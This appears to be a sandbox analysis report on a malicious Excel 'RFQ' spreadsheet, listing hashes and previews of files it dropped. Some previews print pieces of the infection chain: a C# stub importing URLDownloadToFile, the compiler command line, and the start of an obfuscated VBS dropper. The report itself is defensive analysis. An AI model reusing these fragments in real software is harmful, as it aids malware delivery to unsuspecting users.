                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A84408C8.emf

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):1603716
                                              Entropy (8bit):2.953046890038694
                                              Encrypted:false
                                              SSDEEP:3072:64rlPwsVb7ooxv+7/jJID1DQ0L97dH+vUCx8vb1:HrlYav+7V21DR97devUCx8b1
                                              MD5:ABAF8DE622835088D16EC41609B17D8D
                                              SHA1:56E9544505F803F3B904B67EC97B11FBD80E0F42
                                              SHA-256:EFD243C39B128410ED530DF9F54D0443E907A35C4928A7955F9459F472119F62
                                              SHA-512:C334535301CECAF8AE50A08026FBAECC5368EFD264BE4BF548B8B90263F0D3217CF7DB73BB12B4259A6F957FF9957526BBCE1A8AA87247E36E37F10C1AD43D06
                                              Malicious:false
                                              Preview:....l................................5.. EMF.....x...%......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...

                                              C:\Users\user\AppData\Local\Temp\RESE61B.tmp

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 9 15:49:02 2024, 1st section name ".debug$S"
                                              Category:dropped
                                              Size (bytes):1328
                                              Entropy (8bit):3.9661392393731845
                                              Encrypted:false
                                              SSDEEP:24:HZe9ERjOoKdHfFwKdNWI+ycuZhNRiYakSmiNPNnqSqd:P/yeKd41ulR5a3mSqSK
                                              MD5:20066545782812EB5254B4A3B2AEDF98
                                              SHA1:43540AE3A41426193D1899FDD6F85B9C403AF8ED
                                              SHA-256:658E9250BE98A46EDD9CAFD52B0ECAE60CAB5E53AA9298A6C741563CB774D114
                                              SHA-512:BCFFDDB9876C643423C27410A59D899CD81ACD76C51C7E2DB89D7E0539D988A65014986223DC98A5BBA15520829DC746900695CFB10FDA1674A633EDE5BEA522
                                              Malicious:false
                                              Preview:L......f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\sepiowy3\CSC80F6A6947D640689146C75DBBC3F89.TMP..................p.Hf..y...$n:oz..........4.......C:\Users\user\AppData\Local\Temp\RESE61B.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.e.p.i.o.w.y.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                              C:\Users\user\AppData\Local\Temp\abwa1xwn.n4w.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\bhv1E0C.tmp

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x01bb010a, page size 32768, DirtyShutdown, Windows version 6.1
                                              Category:dropped
                                              Size (bytes):21037056
                                              Entropy (8bit):1.1363830034622442
                                              Encrypted:false
                                              SSDEEP:24576:Nj1U91o2I+0mZ5luHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:NjEXILuHqqEXwPW+RHA6m1fN
                                              MD5:22F9F88F9FF9D0D438FAA48971C4A07A
                                              SHA1:C8C202340DB73392805CAD92B29845D83D942290
                                              SHA-256:A39C9D72F6B2FAF9B0A80E85C398DABD86E5165CDBA56D1CFAA4F91BDB601832
                                              SHA-512:CFC62B5C6F5C45F5AF97F2FE138ECE5EE29CFDDBA602F9208FB97171EC37E0EEE84A3D18E6FEEE4CE383C246A4A229E57DBCA3A3D8FB38C820E2A39D8C083C74
                                              Malicious:false
                                              Preview:....... ........................u..............................;:...{..51...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\eyswzaui.bvq.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\g1zo2vq3.5du.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\kyh3ns1r.fm1.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\mbkts4iq.1to.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                              Category:dropped
                                              Size (bytes):2
                                              Entropy (8bit):1.0
                                              Encrypted:false
                                              SSDEEP:3:Qn:Qn
                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                              Malicious:false
                                              Preview:..

                                              C:\Users\user\AppData\Local\Temp\sepiowy3\CSC80F6A6947D640689146C75DBBC3F89.TMP

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:MSVC .res
                                              Category:dropped
                                              Size (bytes):652
                                              Entropy (8bit):3.0900151259160236
                                              Encrypted:false
                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryjWlYak7YnqqmWlNPN5Dlq5J:+RI+ycuZhNRiYakSmiNPNnqX
                                              MD5:9170AF4866B01A79CA14AA246E3A6F7A
                                              SHA1:B195C7FAC11653FA16F6EBDEFB79D2BB3B7EBD18
                                              SHA-256:CAEE4161E971DA6CA924F9A9B146F8C4018DF171CCDEB6BD4AE0AECF9184F380
                                              SHA-512:55DCC65ACA409EC658C7F6073954E81DD995E494FC3F3D2D5BABF3F1A68943E3C726E132F444EACCBEBE58F892CED9052BBE7F0CC298C4D0C65C1271B5061C26
                                              Malicious:false
                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.e.p.i.o.w.y.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.e.p.i.o.w.y.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                              C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.0.cs

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (360)
                                              Category:dropped
                                              Size (bytes):477
                                              Entropy (8bit):3.9535799752349936
                                              Encrypted:false
                                              SSDEEP:6:V/DsYLDS81zuyPN+fVMmF/QXReKJ8SRHy4HiJc9KLmTZf/pdKy:V/DTLDfuyF+fTIXfHB9KLUTdKy
                                              MD5:63CEB7F519AD8F581A2F665735F3E246
                                              SHA1:0A20545386E9E8A09253332A58CCFE04F110A14D
                                              SHA-256:C156E735CBE6510CD32E91C531258E4BABF07E441CC434F0DFABCE95053C2ED5
                                              SHA-512:79B5E8E06A295CFAEBC59F06E339EE6073C01AC007390E39D16E076003ACDBEC68FC724D3695B6B0DCFACAE746BE3F763C123B35CAAB0EF48FBEB3F831F45071
                                              Malicious:false
                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace YSQd.{. public class IEGAIItDM. {. [DllImport("Urlmon.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr aTZZJyGfA,string EZNvRTw,string mPEPBJREUJ,uint FFy,IntPtr aIMfbwlDpV);.. }..}.

                                              C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                              Category:dropped
                                              Size (bytes):369
                                              Entropy (8bit):5.180774798416366
                                              Encrypted:false
                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fLp0zxs7+AEszIP23fLrH:p37Lvkmb6KzKWZEofH
                                              MD5:AB82CF1560C6AD08F56EF4B239765EB2
                                              SHA1:244F48C54CF3B487C7566E9A1CA648ECCD42F787
                                              SHA-256:9593293FE8DAC4EDA9D710CF1BA1E16863C4D9D17A43436F4BC5E6F8B5535E8B
                                              SHA-512:93746B5E07B8DE27BCEC51F62D152A3E94E898A276C7A95BA6905468436E317E7BFD66D2A22F204043EAC4B356383117A394550641B0AC68075288A09B41BF9D
                                              Malicious:true
                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.0.cs"

                                              C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.dll

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):3072
                                              Entropy (8bit):2.8654393562973777
                                              Encrypted:false
                                              SSDEEP:24:etGSLp2YYnl8sNgkdq5yBmgtkZfLdxq4lWI+ycuZhNRiYakSmiNPNnq:68Y8+yqlHJLzqF1ulR5a3mSq
                                              MD5:3ACE7B05982103A54C9A95B291145C17
                                              SHA1:175BFF9DE0C4C60DA5BA31D8CDD6F91702EB7254
                                              SHA-256:B7548FF64B748F321F82FA48184FD6A3CDD2B3570FDA1EC0A07D4B50BF0098C7
                                              SHA-512:956D659689242B42A184AEA3D08556D8FA733372766178DCBC03D9E96F2A43E5CC35E86C7F1087DC939B3D228BF42DBB1873BE9691B13F3D5F7CFFCDA36CC73B
                                              Malicious:false
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!.................#... ...@....... ....................................@.................................h#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......(...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.......................................!.............. =.....P ......O.........U....._.....g.....r.....v...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.se

                                              C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.out

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                              Category:modified
                                              Size (bytes):866
                                              Entropy (8bit):5.304377065785604
                                              Encrypted:false
                                              SSDEEP:24:AId3ka6KzrEofOKaMD5DqBVKVrdFAMBJTH:Akka60rEoWKdDcVKdBJj
                                              MD5:97029A2ADD9C8EE535A65BB5BBF5D914
                                              SHA1:12F4773C9ABCFCFA73D5770F2F5084D645A5862F
                                              SHA-256:36785551672E28353355220BA8B9B7684B074A95C43E977EBA830F955A1D220A
                                              SHA-512:A8A4490B6A85A3826A6D0415E4FC274BD1D665EEE79301BA1A1CA46B3E522CD31710B4008ECC6E518AD586A327EF9152BC52816CF83700C2437464F327501F99
                                              Malicious:false
                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                              C:\Users\user\AppData\Local\Temp\ujuetnui.fy2.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1

                                              C:\Users\user\AppData\Local\Temp\~DF0391CB0D24507063.TMP

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\~DFD98D56168A319671.TMP

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\1EH9QFV1.txt

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):71
                                              Entropy (8bit):4.075194904034881
                                              Encrypted:false
                                              SSDEEP:3:X6RS/4AA00jNyRv76RVAv:qRoNAjQRD6nAv
                                              MD5:6B591054CA731DE548833935D71A7202
                                              SHA1:1C911135BAADB4ED81EAEC1D2B7E9EA2242C3792
                                              SHA-256:D49DF0C9DF5363C4649730406D4A63233C9B4BAD73DBA1A21E22D1B64199C73F
                                              SHA-512:7C486C099AB0B8F7E5C77B75B22C3503BEE073D16131BBE591785E692FCE43BB4EDD12D8088956511144FB515B8CBD68DEB6B882DB6F5D5A37E58DC01C7922E1
                                              Malicious:false
                                              Preview:short_478567.1.zeep.ly/.9728.3751017984.31130321.3333757246.31130319.*.

                                              C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):194206
                                              Entropy (8bit):3.8801703450865306
                                              Encrypted:false
                                              SSDEEP:3072:7merF4nF3I2A7lE9QVBpEE8gt5pdGwpgCGy8/tpmqDyJVvnpUcFoqszc:7JrF4VI9lE9aGOVvnpUcFoqszc
                                              MD5:9E0D5ADD50B62609B0D1A62A2B51B13A
                                              SHA1:6D23598F979CF1E8815A0AF91D68249E36272DFC
                                              SHA-256:E06A1DD0178864407F0E0BD4BC036E56B1D943AA07EAA743432FF16A70F38365
                                              SHA-512:F72E53232F1F382800DDA2536DCA4D8345F4B24F156CC41E8DC4DF3074908A51043F27B4B5E4A67F9BB577B9334C62C8D7CDE3D5D7E9B1D136E818822FBDF1DA
                                              Malicious:true
                                              Preview:..u.W.b.G.g.W.l.m.G.L.i.f. .=. .".P.W.z.f.W.P.p.U.z.i.N.q.".....u.p.L.O.c.z.Z.W.p.L.W.d. .=. .".L.W.W.O.W.W.W.k.a.G.v.n.".....W.L.j.i.A.H.x.U.p.m.K.U. .=. .".L.o.Z.U.h.i.e.e.A.G.u.K.".....b.m.q.c.W.b.H.K.b.k.i.B. .=. .".t.L.z.n.j.m.N.G.e.A.A.i.".....A.A.o.L.a.Z.N.W.N.e.L.h. .=. .".d.G.a.A.N.e.G.q.m.l.J.b.".....P.U.k.r.R.K.U.b.x.N.o.m. .=. .".e.o.h.G.c.e.l.c.h.H.o.I.".....K.W.N.I.P.u.L.L.Z.u.p.C. .=. .".L.i.h.f.g.m.q.z.i.L.L.L.".....T.v.P.n.z.k.A.B.a.p.x.P. .=. .".P.W.C.x.U.Q.K.G.i.f.a.O.".....U.c.L.t.c.m.L.N.p.m.v.W. .=. .".z.W.L.P.S.L.L.a.s.s.L.L.".....c.x.R.x.K.t.a.U.O.z.o.W. .=. .".G.q.C.z.G.c.b.L.N.T.Z.k.".........U.L.A.C.x.G.W.W.c.G.m.Z. .=. .".Z.g.u.C.i.K.L.W.e.o.K.p.".....W.K.h.J.W.K.k.q.Q.R.u.x. .=. .".x.k.L.W.C.U.c.N.b.f.b.d.".....x.L.P.O.h.d.u.L.U.b.o.g. .=. .".L.K.Z.p.m.P.W.K.L.L.L.c.".....P.m.g.L.O.u.W.h.R.l.L.O. .=. .".Z.o.A.n.k.x.b.e.t.G.W.e.".....T.R.A.p.i.o.G.k.n.c.k.c. .=. .".k.L.i.L.i.d.R.S.n.J.h.P.".....b.q.b.b.U.Z.u.B.k.o.H.o. .=. .".z.W.k.Z.W.W.W.L.e.o.W.e.".....i.

                                              C:\Users\user\Desktop\B3930000

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 9 16:49:12 2024, Security: 1
                                              Category:dropped
                                              Size (bytes):175104
                                              Entropy (8bit):7.908618258770144
                                              Encrypted:false
                                              SSDEEP:3072:zXINLAL/GkVleHluVD7Mj7pMciSvsTL5ybgyju0DrFjigmX:z4Zq/fVle0VA7q2vsTL5ybE0DrVRmX
                                              MD5:8BE276AC02948DCCDF300B16E67A4AFF
                                              SHA1:ACB16041352E9111EB4A53D176CBDAE0DE34CDED
                                              SHA-256:ED8C0C496529FD73AE1F7C3AB16A4E9B55B93C56924245B93032A9543903145A
                                              SHA-512:0542392527FA14BF52DBCC1055582551DA18E32AFC9F0C5A39A37798B0224F86575DD0C1BBDB011FB489D7FD2B5BD142296328AA4A4DAEBCF4CF7B2FC98522E6
                                              Malicious:false
                                              Preview:......................>...................................'...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................S................................................................................................................... ...!..."...#...$...%...&...........)...T...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...k.......l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                              C:\Users\user\Desktop\B3930000:Zone.Identifier

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Users\user\Desktop\RFQ_0230909024SEPT.xla.xls (copy)

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 9 16:49:12 2024, Security: 1
                                              Category:dropped
                                              Size (bytes):175104
                                              Entropy (8bit):7.908618258770144
                                              Encrypted:false
                                              SSDEEP:3072:zXINLAL/GkVleHluVD7Mj7pMciSvsTL5ybgyju0DrFjigmX:z4Zq/fVle0VA7q2vsTL5ybE0DrVRmX
                                              MD5:8BE276AC02948DCCDF300B16E67A4AFF
                                              SHA1:ACB16041352E9111EB4A53D176CBDAE0DE34CDED
                                              SHA-256:ED8C0C496529FD73AE1F7C3AB16A4E9B55B93C56924245B93032A9543903145A
                                              SHA-512:0542392527FA14BF52DBCC1055582551DA18E32AFC9F0C5A39A37798B0224F86575DD0C1BBDB011FB489D7FD2B5BD142296328AA4A4DAEBCF4CF7B2FC98522E6
                                              Malicious:false
                                              Preview:......................>...................................'...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................S................................................................................................................... ...!..."...#...$...%...&...........)...T...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...k.......l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                              C:\Users\user\Desktop\~$RFQ_0230909024SEPT.xla.xlsx

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:modified
                                              Size (bytes):165
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                              Malicious:true
                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 9 07:52:02 2024, Security: 1
                                              Entropy (8bit):7.808393317199207
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 47.99%
                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                              File name:RFQ_0230909024SEPT.xla.xlsx
                                              File size:184'320 bytes
                                              MD5:4845ee83a0c0be0e039c18c4d7720ee1
                                              SHA1:770f3d61acab0397fef8a398a1b9c4e3ad8b59ad
                                              SHA256:5d0bf961a7a1039d1ec84f5dc6705d922d6aea6ed935e2481d07e2428c743dc5
                                              SHA512:cfc47eca753c568069d40884742a2c95d5ece3fdfe074e32112165916664aba81473a476693094177e5a61b409c045e4cf0461ac164f9d16860cbb0f7788533c
